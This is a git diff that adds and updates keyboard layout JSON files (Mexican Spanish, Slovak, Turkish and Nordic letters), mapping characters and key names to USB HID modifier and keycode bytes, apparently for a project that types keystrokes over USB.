" ": "00,00,2c",
|
||||
"-": "00,00,2d",
|
||||
"=": "02,00,2d",
|
||||
"^": "00,00,2e",
|
||||
"~": "02,00,2e",
|
||||
"@": "00,00,2f",
|
||||
"`": "02,00,2f",
|
||||
"[": "00,00,30",
|
||||
"{": "02,00,30",
|
||||
"\\": "00,00,31",
|
||||
"|": "02,00,31",
|
||||
"]": "00,00,32",
|
||||
"}": "02,00,32",
|
||||
";": "00,00,33",
|
||||
"+": "02,00,33",
|
||||
":": "00,00,34",
|
||||
"*": "02,00,34",
|
||||
",": "00,00,36",
|
||||
"<": "02,00,36",
|
||||
".": "00,00,37",
|
||||
">": "02,00,37",
|
||||
"/": "00,00,38",
|
||||
"?": "02,00,38",
|
||||
"CAPSLOCK": "00,00,39",
|
||||
"F1": "00,00,3a",
|
||||
"F2": "00,00,3b",
|
||||
"F3": "00,00,3c",
|
||||
"F4": "00,00,3d",
|
||||
"F5": "00,00,3e",
|
||||
"F6": "00,00,3f",
|
||||
"F7": "00,00,40",
|
||||
"F8": "00,00,41",
|
||||
"F9": "00,00,42",
|
||||
"F10": "00,00,43",
|
||||
"F11": "00,00,44",
|
||||
"F12": "00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK": "00,00,47",
|
||||
"PAUSE": "00,00,48",
|
||||
"BREAK": "00,00,48",
|
||||
"INSERT": "00,00,49",
|
||||
"HOME": "00,00,4a",
|
||||
"PAGEUP": "00,00,4b",
|
||||
"DELETE": "00,00,4c",
|
||||
"DEL": "00,00,4c",
|
||||
"END": "00,00,4d",
|
||||
"PAGEDOWN": "00,00,4e",
|
||||
"RIGHTARROW": "00,00,4f",
|
||||
"RIGHT": "00,00,4f",
|
||||
"LEFTARROW": "00,00,50",
|
||||
"LEFT": "00,00,50",
|
||||
"DOWNARROW": "00,00,51",
|
||||
"DOWN": "00,00,51",
|
||||
"UPARROW": "00,00,52",
|
||||
"UP": "00,00,52",
|
||||
"NUMLOCK": "00,00,53",
|
||||
"MENU": "00,00,65",
|
||||
"APP": "00,00,65"
|
||||
}
|
||||
177
languages/mx.json
Normal file
177
languages/mx.json
Normal file
@@ -0,0 +1,177 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":"A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment":" ",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"y":"00,00,1c",
|
||||
"z":"00,00,1d",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
"4":"00,00,21",
|
||||
"5":"00,00,22",
|
||||
"6":"00,00,23",
|
||||
"7":"00,00,24",
|
||||
"8":"00,00,25",
|
||||
"9":"00,00,26",
|
||||
"0":"00,00,27",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"'":"00,00,2d",
|
||||
"¿":"00,00,2e",
|
||||
"´":"00,00,2f",
|
||||
"+":"00,00,30",
|
||||
"}":"00,00,31",
|
||||
"ñ":"00,00,33",
|
||||
"{":"00,00,34",
|
||||
"|":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"-":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"<":"00,00,64",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Y":"02,00,1c",
|
||||
"Z":"02,00,1d",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"#":"02,00,20",
|
||||
"$":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"&":"02,00,23",
|
||||
"/":"02,00,24",
|
||||
"(":"02,00,25",
|
||||
")":"02,00,26",
|
||||
"=":"02,00,27",
|
||||
"?":"02,00,2d",
|
||||
"¡":"02,00,2e",
|
||||
"¨":"02,00,2f",
|
||||
"*":"02,00,30",
|
||||
"]":"02,00,31",
|
||||
"Ñ":"02,00,33",
|
||||
"[":"02,00,34",
|
||||
"°":"02,00,35",
|
||||
";":"02,00,36",
|
||||
":":"02,00,37",
|
||||
"_":"02,00,38",
|
||||
">":"02,00,64",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"\\":"05,00,2d",
|
||||
"~":"05,00,30",
|
||||
"`":"05,00,31",
|
||||
"^":"05,00,34",
|
||||
"¬":"05,00,35",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT":"12,00,00",
|
||||
"@":"40,00,14"
|
||||
}
|
||||
@@ -43,6 +43,9 @@
|
||||
"x":"00,00,1b",
|
||||
"y":"00,00,1c",
|
||||
"z":"00,00,1d",
|
||||
"æ":"00,00,34",
|
||||
"ø":"00,00,33",
|
||||
"å":"00,00,2f",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
@@ -131,6 +134,9 @@
|
||||
"X":"02,00,1b",
|
||||
"Y":"02,00,1c",
|
||||
"Z":"02,00,1d",
|
||||
"Æ":"02,00,34",
|
||||
"Ø":"02,00,33",
|
||||
"Å":"02,00,2f",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"#":"02,00,20",
|
||||
|
||||
169
languages/sk.json
Normal file
169
languages/sk.json
Normal file
@@ -0,0 +1,169 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":" Slovak QWERTZ version made by Andrej Šimko",
|
||||
"__comment":" Note that some special characters use leftCtrl+leftAlt+[key]",
|
||||
"__comment":" Special Slovak characters like ľščťžýáíéúäô are not included",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"z":"00,00,1c",
|
||||
"y":"00,00,1d",
|
||||
"+":"00,00,1e",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"=":"00,00,2d",
|
||||
";":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"-":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Z":"02,00,1c",
|
||||
"Y":"02,00,1d",
|
||||
"1":"02,00,1e",
|
||||
"2":"02,00,1f",
|
||||
"3":"02,00,20",
|
||||
"4":"02,00,21",
|
||||
"5":"02,00,22",
|
||||
"6":"02,00,23",
|
||||
"7":"02,00,24",
|
||||
"8":"02,00,25",
|
||||
"9":"02,00,26",
|
||||
"0":"02,00,27",
|
||||
"\\":"05,00,14",
|
||||
"%":"02,00,2d",
|
||||
"/":"02,00,2f",
|
||||
"(":"02,00,30",
|
||||
"'":"05,00,13",
|
||||
")":"02,00,31",
|
||||
"\"":"02,00,33",
|
||||
"!":"02,00,34",
|
||||
"?":"02,00,36",
|
||||
":":"02,00,37",
|
||||
"_":"02,00,38",
|
||||
"|":"05,00,1a",
|
||||
"#":"05,00,1b",
|
||||
"&":"05,00,06",
|
||||
"@":"05,00,19",
|
||||
"$":"05,00,33",
|
||||
"*":"05,00,38",
|
||||
"{":"05,00,05",
|
||||
"}":"05,00,11",
|
||||
"[":"05,00,09",
|
||||
"]":"05,00,0a",
|
||||
"~":"05,00,1e",
|
||||
"^":"05,00,20",
|
||||
"<":"05,00,36",
|
||||
">":"05,00,37",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
||||
}
|
||||
173
languages/tr.json
Normal file
173
languages/tr.json
Normal file
@@ -0,0 +1,173 @@
|
||||
{
|
||||
"__comment": "All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment": " ",
|
||||
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment": " of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment": " ",
|
||||
"__comment": "Definition of these 3 bytes can be found",
|
||||
"__comment": " in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment": " of document Device Class Definition for HID Version 1.11",
|
||||
"__comment": " - byte 1: Modifier keys",
|
||||
"__comment": " - byte 2: Reserved",
|
||||
"__comment": " - byte 3: Keycode 1",
|
||||
"__comment": " ",
|
||||
"__comment": "Both documents can be obtained from link here",
|
||||
"__comment": " http://www.usb.org/developers/hidpage/",
|
||||
"__comment": " ",
|
||||
"__comment": "A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment": " ",
|
||||
"CTRL": "01,00,00",
|
||||
"CONTROL": "01,00,00",
|
||||
"SHIFT": "02,00,00",
|
||||
"ALT": "04,00,00",
|
||||
"GUI": "08,00,00",
|
||||
"WINDOWS": "08,00,00",
|
||||
"CTRL-ALT": "05,00,00",
|
||||
"CTRL-SHIFT": "03,00,00",
|
||||
"ALT-SHIFT": "06,00,00",
|
||||
"__comment": "Below 5 key combinations are for Mac OSX",
|
||||
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
|
||||
"COMMAND": "08,00,00",
|
||||
"COMMAND-CTRL": "09,00,00",
|
||||
"COMMAND-CTRL-SHIFT": "0B,00,00",
|
||||
"COMMAND-OPTION": "0C,00,00",
|
||||
"COMMAND-OPTION-SHIFT": "0E,00,00",
|
||||
"a": "00,00,04",
|
||||
"A": "02,00,04",
|
||||
"b": "00,00,05",
|
||||
"B": "02,00,05",
|
||||
"c": "00,00,06",
|
||||
"C": "02,00,06",
|
||||
"d": "00,00,07",
|
||||
"D": "02,00,07",
|
||||
"e": "00,00,08",
|
||||
"E": "02,00,08",
|
||||
"f": "00,00,09",
|
||||
"F": "02,00,09",
|
||||
"g": "00,00,0a",
|
||||
"G": "02,00,0a",
|
||||
"h": "00,00,0b",
|
||||
"H": "02,00,0b",
|
||||
"i": "00,00,34",
|
||||
"I": "02,00,0c",
|
||||
"j": "00,00,0d",
|
||||
"J": "02,00,0d",
|
||||
"k": "00,00,0e",
|
||||
"K": "02,00,0e",
|
||||
"l": "00,00,0f",
|
||||
"L": "02,00,0f",
|
||||
"m": "00,00,10",
|
||||
"M": "02,00,10",
|
||||
"n": "00,00,11",
|
||||
"N": "02,00,11",
|
||||
"o": "00,00,12",
|
||||
"O": "02,00,12",
|
||||
"p": "00,00,13",
|
||||
"P": "02,00,13",
|
||||
"q": "00,00,14",
|
||||
"Q": "02,00,14",
|
||||
"r": "00,00,15",
|
||||
"R": "02,00,15",
|
||||
"s": "00,00,16",
|
||||
"S": "02,00,16",
|
||||
"t": "00,00,17",
|
||||
"T": "02,00,17",
|
||||
"u": "00,00,18",
|
||||
"U": "02,00,18",
|
||||
"v": "00,00,19",
|
||||
"V": "02,00,19",
|
||||
"w": "00,00,1a",
|
||||
"W": "02,00,1a",
|
||||
"x": "00,00,1b",
|
||||
"X": "02,00,1b",
|
||||
"y": "00,00,1c",
|
||||
"Y": "02,00,1c",
|
||||
"z": "00,00,1d",
|
||||
"Z": "02,00,1d",
|
||||
"1": "00,00,1e",
|
||||
"!": "02,00,1e",
|
||||
"2": "00,00,1f",
|
||||
"@": "40,00,14",
|
||||
"3": "00,00,20",
|
||||
"#": "40,00,20",
|
||||
"4": "00,00,21",
|
||||
"$": "40,00,21",
|
||||
"5": "00,00,22",
|
||||
"%": "02,00,22",
|
||||
"6": "00,00,23",
|
||||
"^": "02,00,20",
|
||||
"7": "00,00,24",
|
||||
"&": "02,00,23",
|
||||
"8": "00,00,25",
|
||||
"*": "00,00,2d",
|
||||
"9": "00,00,26",
|
||||
"(": "02,00,25",
|
||||
"0": "00,00,27",
|
||||
")": "02,00,26",
|
||||
"ENTER": "00,00,28",
|
||||
"ESC": "00,00,29",
|
||||
"ESCAPE": "00,00,29",
|
||||
"BACKSPACE": "00,00,2a",
|
||||
"TAB": "00,00,2b",
|
||||
"ALT-TAB": "04,00,2b",
|
||||
"SPACE": "00,00,2c",
|
||||
" ": "00,00,2c",
|
||||
"-": "00,00,2e",
|
||||
"_": "02,00,2e",
|
||||
"=": "02,00,27",
|
||||
"+": "02,00,21",
|
||||
"[": "40,00,25",
|
||||
"{": "40,00,24",
|
||||
"]": "40,00,26",
|
||||
"}": "40,00,27",
|
||||
"\\": "40,00,2d",
|
||||
"|": "40,00,2e",
|
||||
";": "02,00,31",
|
||||
":": "02,00,38",
|
||||
"'": "02,00,1f",
|
||||
"\"": "00,00,35",
|
||||
"`": "40,00,31",
|
||||
"~": "40,00,30",
|
||||
",": "00,00,31",
|
||||
"<": "40,00,35",
|
||||
".": "00,00,38",
|
||||
">": "40,00,1e",
|
||||
"/": "02,00,24",
|
||||
"?": "02,00,2d",
|
||||
"CAPSLOCK": "00,00,39",
|
||||
"F1": "00,00,3a",
|
||||
"F2": "00,00,3b",
|
||||
"F3": "00,00,3c",
|
||||
"F4": "00,00,3d",
|
||||
"F5": "00,00,3e",
|
||||
"F6": "00,00,3f",
|
||||
"F7": "00,00,40",
|
||||
"F8": "00,00,41",
|
||||
"F9": "00,00,42",
|
||||
"F10": "00,00,43",
|
||||
"F11": "00,00,44",
|
||||
"F12": "00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK": "00,00,47",
|
||||
"PAUSE": "00,00,48",
|
||||
"BREAK": "00,00,48",
|
||||
"INSERT": "00,00,49",
|
||||
"HOME": "00,00,4a",
|
||||
"PAGEUP": "00,00,4b",
|
||||
"DELETE": "00,00,4c",
|
||||
"DEL": "00,00,4c",
|
||||
"END": "00,00,4d",
|
||||
"PAGEDOWN": "00,00,4e",
|
||||
"RIGHTARROW": "00,00,4f",
|
||||
"RIGHT": "00,00,4f",
|
||||
"LEFTARROW": "00,00,50",
|
||||
"LEFT": "00,00,50",
|
||||
"DOWNARROW": "00,00,51",
|
||||
"DOWN": "00,00,51",
|
||||
"UPARROW": "00,00,52",
|
||||
"UP": "00,00,52",
|
||||
"NUMLOCK": "00,00,53",
|
||||
"MENU": "00,00,65",
|
||||
"APP": "00,00,65"
|
||||
}
|
||||
@@ -1,169 +1,173 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":"A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment":" ",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"y":"00,00,1c",
|
||||
"z":"00,00,1d",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
"4":"00,00,21",
|
||||
"5":"00,00,22",
|
||||
"6":"00,00,23",
|
||||
"7":"00,00,24",
|
||||
"8":"00,00,25",
|
||||
"9":"00,00,26",
|
||||
"0":"00,00,27",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"-":"00,00,2d",
|
||||
"=":"00,00,2e",
|
||||
"[":"00,00,2f",
|
||||
"]":"00,00,30",
|
||||
"\\":"00,00,31",
|
||||
";":"00,00,33",
|
||||
"'":"00,00,34",
|
||||
"`":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"/":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Y":"02,00,1c",
|
||||
"Z":"02,00,1d",
|
||||
"!":"02,00,1e",
|
||||
"@":"02,00,1f",
|
||||
"#":"02,00,20",
|
||||
"$":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"^":"02,00,23",
|
||||
"&":"02,00,24",
|
||||
"*":"02,00,25",
|
||||
"(":"02,00,26",
|
||||
")":"02,00,27",
|
||||
"_":"02,00,2d",
|
||||
"+":"02,00,2e",
|
||||
"{":"02,00,2f",
|
||||
"}":"02,00,30",
|
||||
"|":"02,00,31",
|
||||
":":"02,00,33",
|
||||
"\"":"02,00,34",
|
||||
"~":"02,00,35",
|
||||
"<":"02,00,36",
|
||||
">":"02,00,37",
|
||||
"?":"02,00,38",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
||||
}
|
||||
"__comment": "All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment": " ",
|
||||
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment": " of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment": " ",
|
||||
"__comment": "Definition of these 3 bytes can be found",
|
||||
"__comment": " in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment": " of document Device Class Definition for HID Version 1.11",
|
||||
"__comment": " - byte 1: Modifier keys",
|
||||
"__comment": " - byte 2: Reserved",
|
||||
"__comment": " - byte 3: Keycode 1",
|
||||
"__comment": " ",
|
||||
"__comment": "Both documents can be obtained from link here",
|
||||
"__comment": " http://www.usb.org/developers/hidpage/",
|
||||
"__comment": " ",
|
||||
"__comment": "A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment": " ",
|
||||
"CTRL": "01,00,00",
|
||||
"CONTROL": "01,00,00",
|
||||
"SHIFT": "02,00,00",
|
||||
"ALT": "04,00,00",
|
||||
"GUI": "08,00,00",
|
||||
"WINDOWS": "08,00,00",
|
||||
"CTRL-ALT": "05,00,00",
|
||||
"CTRL-SHIFT": "03,00,00",
|
||||
